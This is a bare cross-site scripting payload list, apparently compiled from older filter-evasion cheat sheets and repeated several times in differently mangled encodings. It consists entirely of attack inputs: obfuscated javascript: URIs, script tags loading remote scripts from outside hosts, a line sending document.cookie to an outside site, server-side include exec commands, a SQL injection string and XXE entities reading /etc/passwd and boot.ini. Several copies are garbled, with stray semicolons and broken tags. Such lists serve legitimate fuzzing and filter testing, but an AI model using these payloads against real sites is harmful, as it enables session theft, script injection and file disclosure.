	&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
	&lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
	&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
	&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
	\&quot;;alert(&apos;XSS&apos;);//
	&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
	&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
	&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
	perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
	perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
	&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/\|\]^`=alert(&quot;XSS&quot;)&gt;
	&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
	&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
	&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
	&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
	&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
	&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
	&lt;SCRIPT&gt;a=/XSS/
	&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
	&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
	&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
	<script>document.vulnerable=true;</script>
	<img SRC="jav ascript:document.vulnerable=true;">
	<img SRC="javascript:document.vulnerable=true;">
	<img SRC=" &#14; javascript:document.vulnerable=true;">
	<body onload!#$%&()*~+-_.,:;?@[/\|\]^`=document.vulnerable=true;>
	<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
	<script <B>document.vulnerable=true;</script>
	<img SRC="javascript:document.vulnerable=true;"
	<iframe src="javascript:document.vulnerable=true; <
	<script>a=/XSS/\ndocument.vulnerable=true;</script>
	\";document.vulnerable=true;;//
	</title><SCRIPT>document.vulnerable=true;</script>
	<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
	<body BACKGROUND="javascript:document.vulnerable=true;">
	<body ONLOAD=document.vulnerable=true;>
	<img DYNSRC="javascript:document.vulnerable=true;">
	<img LOWSRC="javascript:document.vulnerable=true;">
	<bgsound SRC="javascript:document.vulnerable=true;">
	<br SIZE="&{document.vulnerable=true}">
	<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
	<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
	<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
	<img SRC='vbscript:document.vulnerable=true;'>
	1script3document.vulnerable=true;1/script3
	<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
	<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
	<IFRAME SRC="javascript:document.vulnerable=true;">









	exp/*<a rel="nofollow noopener" target="_blank">

	</a><a class="XSS" rel="nofollow noopener" target="_blank"></a>




	]]
	<i><b></b></i>

	document.vulnerable=true'); ?>

	+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
	<a href="javascript#document.vulnerable=true;" rel="nofollow noopener" target="_blank">





	&
	&{document.vulnerable=true;};



	<img src="mocha:document.vulnerable=true;">
	<img src="livescript:document.vulnerable=true;">
	<a href="about:<script>document.vulnerable=true;</script>">
	<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
	<body onload="document.vulnerable=true;">
	<div style="background-image: url(javascript:document.vulnerable=true;);">
	<div style="behaviour: url([link to code]);">
	<div style="binding: url([link to code]);">
	<div style="width: expression(document.vulnerable=true;);">
	<style type="text/javascript">document.vulnerable=true;</style>
	<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
	<style><!--</style><script>document.vulnerable=true;//--></script>
	<<script>document.vulnerable=true;</script>
	<![<!--]]<script>document.vulnerable=true;//--></script>
	<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
	<img src="blah"onmouseover="document.vulnerable=true;">
	<img src="blah>" onmouseover="document.vulnerable=true;">
	<xml src="javascript:document.vulnerable=true;">
	<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
	<div datafld="b" dataformatas="html" datasrc="#X"></div>
	[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
	<style>@import'http://www.securitycompass.com/xss.css';</style>
	<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
	<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
	<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
	<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
	<script SRC="http://www.securitycompass.com/xss.jpg"></script>
	<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
	<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
	<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
	<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
	<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
	<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
	&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/\|\]^`=alert(&quot;XSS&quot;)&gt;
	&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
	&lt;/br style=a:expression(alert())&gt;
	&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
	&lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
	perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
	perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
	<~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	<~/XSS/-/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
	<~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	<~/XSS STYLE=xss:expression(alert('XSS'))>
	"><script>alert('XSS')</script>
	</XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	XSS STYLE=xss:e/**/xpression(alert('XSS'))>
	</XSS STYLE=xss:expression(alert('XSS'))>
	';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
	';';;!--";<;XSS>;=&;{()}
	<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
	<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
	<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
	<;BASE HREF=";javascript:alert(';XSS';);//";>;
	<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
	<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
	<;BODY ONLOAD=alert(';XSS';)>;
	<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
	<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
	<;DIV STYLE=";width: expression(alert(';XSS';));";>;
	<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
	<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
	<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
	<;IMG SRC=";javascript:alert(';XSS';);";>;
	<;IMG SRC=javascript:alert(';XSS';)>;
	<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
	<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
	<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
	Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
	exp/<;XSS STYLE=';no\xss:noxss(";//*";);
	<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS
	<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
	<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
	<;IMG SRC=";livescript:[code]";>;
	%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
	<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
	<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
	<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
	<;IMG SRC=";mocha:[code]";>;
	<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
	<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
	<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
	a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);
	<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
	<;IMG STYLE=";xss:expr/XSS/ession(alert(';XSS';))";>;
	<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
	<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
	<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
	<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
	<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
	<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
	<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
	<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
	<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
	<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
	<;HTML xmlns:xss>;
	<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
	<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
	<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
	<;HTML>;<;BODY>;
	<;!--[if gte IE 4]>;
	<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
	<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
	<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
	<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
	<;? echo(';<;SCR)';;
	<;BR SIZE=";&;{alert(';XSS';)}";>;
	<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
	<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
	<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
	<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
	<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
	<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
	<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
	<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
	<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
	\";;alert(';XSS';);//
	<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
	<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
	<;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>;
	<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
	<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
	<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
	<;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D;
	perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
	perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
	<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
	<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;BODY onload!#$%&;()*~+-_.,:;?@[/\|\]^`=alert(";XSS";)>;
	<;SCRIPT SRC=http://ha.ckers.org/xss.js
	<;SCRIPT SRC=//ha.ckers.org/.j>;
	<;IMG SRC=";javascript:alert(';XSS';)";
	<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
	<;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
	<;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
	<;SCRIPT>;a=/XSS/
	<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
	<;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
	<;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
	<;A HREF=";http://1113982867/";>;XSS<;/A>;
	<;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
	<;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
	<;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
	<;A HREF=";//www.google.com/";>;XSS<;/A>;
	<;A HREF=";//google";>;XSS<;/A>;
	<;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
	<;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
	<;A HREF=";http://google.com/";>;XSS<;/A>;
	<;A HREF=";http://www.google.com./";>;XSS<;/A>;
	<;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
	<;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
	<script>document.vulnerable=true;</script>
	<img SRC="jav ascript:document.vulnerable=true;">
	<img SRC="javascript:document.vulnerable=true;">
	<img SRC=" &#14; javascript:document.vulnerable=true;">
	<body onload!#$%&()*~+-_.,:;?@[/\|\]^`=document.vulnerable=true;>
	<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
	<script <B>document.vulnerable=true;</script>
	<img SRC="javascript:document.vulnerable=true;"
	<iframe src="javascript:document.vulnerable=true; <
	<script>a=/XSS/\ndocument.vulnerable=true;</script>
	\";document.vulnerable=true;;//
	</title><SCRIPT>document.vulnerable=true;</script>
	<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
	<body BACKGROUND="javascript:document.vulnerable=true;">
	<body ONLOAD=document.vulnerable=true;>
	<img DYNSRC="javascript:document.vulnerable=true;">
	<img LOWSRC="javascript:document.vulnerable=true;">
	<bgsound SRC="javascript:document.vulnerable=true;">
	<br SIZE="&{document.vulnerable=true}">
	<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
	<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
	<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
	<img SRC='vbscript:document.vulnerable=true;'>
	1script3document.vulnerable=true;1/script3
	<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
	<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
	<IFRAME SRC="javascript:document.vulnerable=true;">









	exp/*<a rel="nofollow noopener" target="_blank">

	</a><a class="XSS" rel="nofollow noopener" target="_blank"></a>




	]]
	<i><b></b></i>

	document.vulnerable=true'); ?>

	+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
	<a href="javascript#document.vulnerable=true;" rel="nofollow noopener" target="_blank">





	&
	&{document.vulnerable=true;};



	<img src="mocha:document.vulnerable=true;">
	<img src="livescript:document.vulnerable=true;">
	<a href="about:<script>document.vulnerable=true;</script>">
	<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
	<body onload="document.vulnerable=true;">
	<div style="background-image: url(javascript:document.vulnerable=true;);">
	<div style="behaviour: url([link to code]);">
	<div style="binding: url([link to code]);">
	<div style="width: expression(document.vulnerable=true;);">
	<style type="text/javascript">document.vulnerable=true;</style>
	<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
	<style><!--</style><script>document.vulnerable=true;//--></script>
	<<script>document.vulnerable=true;</script>
	<![<!--]]<script>document.vulnerable=true;//--></script>
	<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
	<img src="blah"onmouseover="document.vulnerable=true;">
	<img src="blah>" onmouseover="document.vulnerable=true;">
	<xml src="javascript:document.vulnerable=true;">
	<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
	<div datafld="b" dataformatas="html" datasrc="#X"></div>
	[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
	<style>@import'http://www.securitycompass.com/xss.css';</style>
	<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
	<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
	<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
	<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
	<script SRC="http://www.securitycompass.com/xss.jpg"></script>
	<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
	<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
	<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
	<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
	<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
	<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
	<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
	";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/\|\]^`=alert(";XSS";)>;
	<;/script>;<;script>;alert(1)<;/script>;
	<;/br style=a:expression(alert())>;
	<;scrscriptipt>;alert(1)<;/scrscriptipt>;
	<;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
	perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
	perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
	<~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	<~/XSS/-/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
	<~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	<~/XSS STYLE=xss:expression(alert('XSS'))>
	"><script>alert('XSS')</script>
	</XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))>
	XSS STYLE=xss:e/**/xpression(alert('XSS'))>
	</XSS STYLE=xss:expression(alert('XSS'))>
	>"><script>alert("XSS")</script>&
	"><STYLE>@import"javascript:alert('XSS')";</STYLE>
	>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
	>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
	'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
	'';!--"<XSS>=&{()}
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
	<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
	<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
	<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
	<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
	<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
	<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
	<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
	<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
	<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
	<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
